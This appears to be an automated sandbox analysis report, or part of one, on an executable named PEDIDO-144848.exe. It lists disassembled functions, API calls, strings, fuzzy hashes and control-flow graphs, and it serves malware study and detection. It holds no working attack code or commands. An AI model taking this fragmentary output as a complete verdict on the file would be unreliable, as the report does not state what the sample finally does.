                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: Window$CallMessageProcSendVisible
                                                        • String ID:
                                                        • API String ID: 3748168415-3916222277
                                                        • Opcode ID: ba6800c79a5e421cc747068b2104ef880767bd6b1526ac3d2082a385ebb11f2d
                                                        • Instruction ID: b201a4cd8f35b1f81cb2229438f9677fc33f9f69eb2c65fa3af33e2f38b160ff
                                                        • Opcode Fuzzy Hash: ba6800c79a5e421cc747068b2104ef880767bd6b1526ac3d2082a385ebb11f2d
                                                        • Instruction Fuzzy Hash: C9015EB150424AAFDF209F61DD81A5B3A26E7C4758F104037FB04B52D1D37AAC929A6E
                                                        Function 00405531 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0079FD48,Error launching installer), ref: 0040555A
                                                        • CloseHandle.KERNEL32(?), ref: 00405567
                                                        Strings
                                                        • Error launching installer, xrefs: 00405544
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateHandleProcess
                                                        • String ID: Error launching installer
                                                        • API String ID: 3712363035-66219284
                                                        • Opcode ID: 9f0b0f85f0295080a22e5d155a7c66e390f8f607a8e504552004f12f3aafe87f
                                                        • Instruction ID: a44fcad5754d04da23f251c2f5d6a8b7866741138784f0b9a4d91a551686e283
                                                        • Opcode Fuzzy Hash: 9f0b0f85f0295080a22e5d155a7c66e390f8f607a8e504552004f12f3aafe87f
                                                        • Instruction Fuzzy Hash: 93E0BFF4A002097FEB10AB64ED49F7B7BADEB00644F408561FD10F6190E674A9549A79
                                                        Function 0040368B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FreeLibrary.KERNEL32(?,758B3410,00000000,C:\Users\user\AppData\Local\Temp\,00403663,0040347D,?), ref: 004036A5
                                                        • GlobalFree.KERNEL32(00847598), ref: 004036AC
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 0040368B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: Free$GlobalLibrary
                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 1100898210-3355392842
                                                        • Opcode ID: f64556832675c450ee94ce825956f3fa5fe3b9abfe3e42bbbd50814105250277
                                                        • Instruction ID: cb5700cda5be72b1964cac96af1ae0fa6ff587f55f39b04be5f0e3e76017d6e4
                                                        • Opcode Fuzzy Hash: f64556832675c450ee94ce825956f3fa5fe3b9abfe3e42bbbd50814105250277
                                                        • Instruction Fuzzy Hash: 78E0C2338011206BC7315F04EE04B2A777C6F48B26F020467ED447B3A087792C524BDC
                                                        Function 00405859 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402D66,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PEDIDO-144848.exe,C:\Users\user\Desktop\PEDIDO-144848.exe,80000000,?), ref: 0040585F
                                                        • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402D66,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PEDIDO-144848.exe,C:\Users\user\Desktop\PEDIDO-144848.exe,80000000,?), ref: 0040586D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: CharPrevlstrlen
                                                        • String ID: C:\Users\user\Desktop
                                                        • API String ID: 2709904686-3370423016
                                                        • Opcode ID: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                        • Instruction ID: 48f05854ad55b04522f039bc0829861de91cdd92fb90a6685f37373cdb6fd5ef
                                                        • Opcode Fuzzy Hash: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                        • Instruction Fuzzy Hash: 05D0C773409DB05EF30362259C04B9F6A98DF17700F094466E580E6191C6789D518BAE
                                                        Function 100010E0 Relevance: 5.1, APIs: 4, Instructions: 102memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
                                                        • GlobalFree.KERNEL32(00000000), ref: 100011B4
                                                        • GlobalFree.KERNEL32(?), ref: 100011C7
                                                        • GlobalFree.KERNEL32(?), ref: 100011F5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115168409337.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000000.00000002.115168379839.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000000.00000002.115168440714.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000000.00000002.115168472087.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_10000000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: Global$Free$Alloc
                                                        • String ID:
                                                        • API String ID: 1780285237-0
                                                        • Opcode ID: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                        • Instruction ID: 5d3a3765e571093bf703368c32e31ec5bfeafbef09712c331e02e9e13643e521
                                                        • Opcode Fuzzy Hash: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                        • Instruction Fuzzy Hash: 6531ABB1808255AFF715CFA8DC89AEA7FE8EB052C1B164115FA45D726CDB34D910CB24
                                                        Function 00405978 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405BD5,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405988
                                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 004059A0
                                                        • CharNextA.USER32(00000000,?,00000000,00405BD5,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004059B1
                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00405BD5,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004059BA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                        • String ID:
                                                        • API String ID: 190613189-0
                                                        • Opcode ID: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                        • Instruction ID: 2b31bcc4a158946671b74a97661090b9e56dbbcbef6738157e9c676b7350d0db
                                                        • Opcode Fuzzy Hash: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                        • Instruction Fuzzy Hash: 7DF0C272515518FFCB029FA5DC00D9EBBA8EF16360B2540AAF800F7310D274EE019BA9

                                                        Execution Graph

                                                        Execution Coverage:0%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:100%
                                                        Total number of Nodes:1
                                                        Total number of Limit Nodes:0
                                                        execution_graph 67965 36c42b90 LdrInitializeThunk

                                                        Executed Functions

                                                        Function 36C434E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 4 36c434e0-36c434ec LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 6037e84b701946f3c0cae306c4fb98e84e7d3d471e84182cc1c0cd3f90fcef9d
                                                        • Instruction ID: 957b90b829d2e66ac347d493b85fe159e2a3e6dbe9611f1dd85680f8dd13e19c
                                                        • Opcode Fuzzy Hash: 6037e84b701946f3c0cae306c4fb98e84e7d3d471e84182cc1c0cd3f90fcef9d
                                                        • Instruction Fuzzy Hash: 2A90023160611812D50061594A14706100597D0205F62C817A241452CEC7A5895575B7
                                                        Function 36C42EB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 3 36c42eb0-36c42ebc LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 1fd42e3c7f6f46d45b33251249b9dbc87c67b56e610f29d016b0d289e89ce5b6
                                                        • Instruction ID: e446d10064a62adb72d2b26f5805ad527df38aff01714866c5d52e588443aba0
                                                        • Opcode Fuzzy Hash: 1fd42e3c7f6f46d45b33251249b9dbc87c67b56e610f29d016b0d289e89ce5b6
                                                        • Instruction Fuzzy Hash: EA90023120241812D50061594D1470B000597D0306F52C417A3154519EC63588557576
                                                        Function 36C42D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2 36c42d10-36c42d1c LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 20aa3e387d39783cd2203680ab484b17a56d7539536ffb4c9fe8567ea9815446
                                                        • Instruction ID: 496fdd80316866de3d33727ac000123d9019385eae62491d62ab0926edb3b76c
                                                        • Opcode Fuzzy Hash: 20aa3e387d39783cd2203680ab484b17a56d7539536ffb4c9fe8567ea9815446
                                                        • Instruction Fuzzy Hash: 1290023120201823D51161594A04707000997D0245F92C817A241451CED6668956B136
                                                        Function 36C42BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1 36c42bc0-36c42bcc LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 7a70fd56917c660d4bb0ae141a28d613d7cffefa0f0f9a05c7666a9b3ad2a7f5
                                                        • Instruction ID: c76e9d27abd06f73fbb37016137e52dcfc59cc7daa9b94461d4b09557c0d5a70
                                                        • Opcode Fuzzy Hash: 7a70fd56917c660d4bb0ae141a28d613d7cffefa0f0f9a05c7666a9b3ad2a7f5
                                                        • Instruction Fuzzy Hash: FB90023120201812D50065995908646000597E0305F52D417A7014519FC67588957136
                                                        Function 36C42B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 36c42b90-36c42b9c LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: a4d0e5c8a25f04766b56a016271bc6578ea984660dbf9db6bd3fb301c5f703d9
                                                        • Instruction ID: 94a6f9805838d01d44a26d9f58faefc49904e0a279e0715e3113a669e6efa12d
                                                        • Opcode Fuzzy Hash: a4d0e5c8a25f04766b56a016271bc6578ea984660dbf9db6bd3fb301c5f703d9
                                                        • Instruction Fuzzy Hash: EF90023120209C12D5106159890474A000597D0305F56C817A641461CEC6A588957136

                                                        Non-executed Functions

                                                        Function 36CA9060 Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 558timeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 574 36ca9060-36ca90a9 575 36ca90ab-36ca90b0 574->575 576 36ca90f8-36ca9107 574->576 577 36ca90b4-36ca90ba 575->577 576->577 578 36ca9109-36ca910e 576->578 579 36ca90c0-36ca90e4 call 36c48f40 577->579 580 36ca9215-36ca923d call 36c48f40 577->580 581 36ca9893-36ca98a7 call 36c44b50 578->581 588 36ca9113-36ca91b4 GetPEB call 36cad7e5 579->588 589 36ca90e6-36ca90f3 call 36cc92ab 579->589 590 36ca923f-36ca925a call 36ca98aa 580->590 591 36ca925c-36ca9292 580->591 601 36ca91d2-36ca91e7 588->601 602 36ca91b6-36ca91c4 588->602 600 36ca91fd-36ca9210 RtlDebugPrintTimes 589->600 595 36ca9294-36ca9296 590->595 591->595 595->581 599 36ca929c-36ca92b1 RtlDebugPrintTimes 595->599 599->581 608 36ca92b7-36ca92be 599->608 600->581 601->600 604 36ca91e9-36ca91ee 601->604 602->601 603 36ca91c6-36ca91cb 602->603 603->601 606 36ca91f3-36ca91f6 604->606 607 36ca91f0 604->607 606->600 607->606 608->581 610 36ca92c4-36ca92df 608->610 611 36ca92e3-36ca92f4 call 36caa388 610->611 614 36ca92fa-36ca92fc 611->614 615 36ca9891 611->615 614->581 616 36ca9302-36ca9309 614->616 615->581 617 36ca930f-36ca9314 616->617 618 36ca947c-36ca9482 616->618 621 36ca933c 617->621 622 36ca9316-36ca931c 617->622 619 36ca9488-36ca94b7 call 36c48f40 618->619 620 36ca961c-36ca9622 618->620 635 36ca94b9-36ca94c4 619->635 636 36ca94f0-36ca9505 619->636 624 36ca9674-36ca9679 620->624 625 36ca9624-36ca962d 620->625 627 36ca9340-36ca9391 call 36c48f40 RtlDebugPrintTimes 621->627 622->621 626 36ca931e-36ca9332 622->626 630 36ca9728-36ca9731 624->630 631 36ca967f-36ca9687 624->631 625->611 629 36ca9633-36ca966f call 36c48f40 625->629 632 36ca9338-36ca933a 626->632 633 36ca9334-36ca9336 626->633 627->581 660 36ca9397-36ca939b 627->660 654 36ca9869 629->654 630->611 637 36ca9737-36ca973a 630->637 639 36ca9689-36ca968d 631->639 640 36ca9693-36ca96bd call 36ca8093 631->640 632->627 633->627 642 36ca94cf-36ca94ee 635->642 643 36ca94c6-36ca94cd 635->643 647 36ca9511-36ca9518 636->647 648 36ca9507-36ca9509 636->648 644 36ca97fd-36ca9834 call 36c48f40 637->644 645 36ca9740-36ca978a 637->645 639->630 639->640 666 36ca9888-36ca988c 640->666 667 36ca96c3-36ca971e call 36c48f40 RtlDebugPrintTimes 640->667 653 36ca9559-36ca9576 RtlDebugPrintTimes 642->653 643->642 678 36ca983b-36ca9842 644->678 679 36ca9836 644->679 651 36ca978c 645->651 652 36ca9791-36ca979e 645->652 657 36ca953d-36ca953f 647->657 655 36ca950b-36ca950d 648->655 656 36ca950f 648->656 651->652 663 36ca97aa-36ca97ad 652->663 664 36ca97a0-36ca97a3 652->664 653->581 686 36ca957c-36ca959f call 36c48f40 653->686 665 36ca986d 654->665 655->647 656->647 661 36ca951a-36ca9524 657->661 662 36ca9541-36ca9557 657->662 669 36ca93eb-36ca9400 660->669 670 36ca939d-36ca93a5 660->670 675 36ca952d 661->675 676 36ca9526 661->676 662->653 673 36ca97b9-36ca97fb 663->673 674 36ca97af-36ca97b2 663->674 664->663 672 36ca9871-36ca9886 RtlDebugPrintTimes 665->672 666->611 667->581 703 36ca9724 667->703 685 36ca9406-36ca9414 669->685 683 36ca93d2-36ca93e9 670->683 684 36ca93a7-36ca93d0 call 36ca8093 670->684 672->581 672->666 673->672 674->673 680 36ca952f-36ca9531 675->680 676->662 687 36ca9528-36ca952b 676->687 681 36ca984d 678->681 682 36ca9844-36ca984b 678->682 679->678 689 36ca953b 680->689 690 36ca9533-36ca9535 680->690 691 36ca9851-36ca9857 681->691 682->691 683->685 693 36ca9418-36ca946f call 36c48f40 RtlDebugPrintTimes 684->693 685->693 706 36ca95bd-36ca95d8 686->706 707 36ca95a1-36ca95bb 686->707 687->680 689->657 690->689 697 36ca9537-36ca9539 690->697 698 36ca9859-36ca985c 691->698 699 36ca985e-36ca9864 691->699 693->581 711 36ca9475-36ca9477 693->711 697->657 698->654 699->665 704 36ca9866 699->704 703->630 704->654 708 36ca95dd-36ca960b RtlDebugPrintTimes 706->708 707->708 708->581 712 36ca9611-36ca9617 708->712 711->666 712->637
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: $ $0
                                                        • API String ID: 3446177414-3352262554
                                                        • Opcode ID: 1b24c6a18e2b4960dcc1c0f491ed4a5b88ceb74090b4ce14c7edb997fcd3dd01
                                                        • Instruction ID: 3173bb00fee36f3612945aee87f7e2f511f24fcbd7e069fce1568a66a260ef3c
                                                        • Opcode Fuzzy Hash: 1b24c6a18e2b4960dcc1c0f491ed4a5b88ceb74090b4ce14c7edb997fcd3dd01
                                                        • Instruction Fuzzy Hash: 2B32F1B5A183828FE350CF69C885B9AFBE5BB88344F00492EF599C7350D774E948CB52
                                                        Function 36C38540 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 783 36c38540-36c385a1 784 36c385a7-36c385b8 783->784 785 36c750a2-36c750a8 783->785 785->784 786 36c750ae-36c750bb GetPEB 785->786 786->784 787 36c750c1-36c750c4 786->787 788 36c750c6-36c750d0 787->788 789 36c750e1-36c75107 call 36c42c00 787->789 788->784 791 36c750d6-36c750df 788->791 789->784 794 36c7510d-36c75111 789->794 792 36c75138-36c7514c call 36c053c0 791->792 799 36c75152-36c7515e 792->799 794->784 796 36c75117-36c7512c call 36c42c00 794->796 796->784 803 36c75132 796->803 801 36c75367-36c75373 call 36c75378 799->801 802 36c75164-36c75178 799->802 801->784 805 36c75196-36c7520c 802->805 806 36c7517a 802->806 803->792 810 36c75245-36c75248 805->810 811 36c7520e-36c75240 call 36bffcf0 805->811 809 36c7517c-36c75183 806->809 809->805 812 36c75185-36c75187 809->812 816 36c7531f-36c75322 810->816 817 36c7524e-36c7529f 810->817 823 36c75358-36c7535d call 36c8a130 811->823 813 36c7518e-36c75190 812->813 814 36c75189-36c7518c 812->814 813->805 818 36c75360-36c75362 813->818 814->809 816->818 819 36c75324-36c75353 call 36bffcf0 816->819 824 36c752a1-36c752d7 call 36bffcf0 817->824 825 36c752d9-36c7531d call 36bffcf0 * 2 817->825 818->799 819->823 823->818 824->823 825->823
                                                        Strings
                                                        • Address of the debug info found in the active list., xrefs: 36C752B9, 36C75305
                                                        • corrupted critical section, xrefs: 36C752CD
                                                        • Critical section address., xrefs: 36C7530D
                                                        • double initialized or corrupted critical section, xrefs: 36C75313
                                                        • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 36C752D9
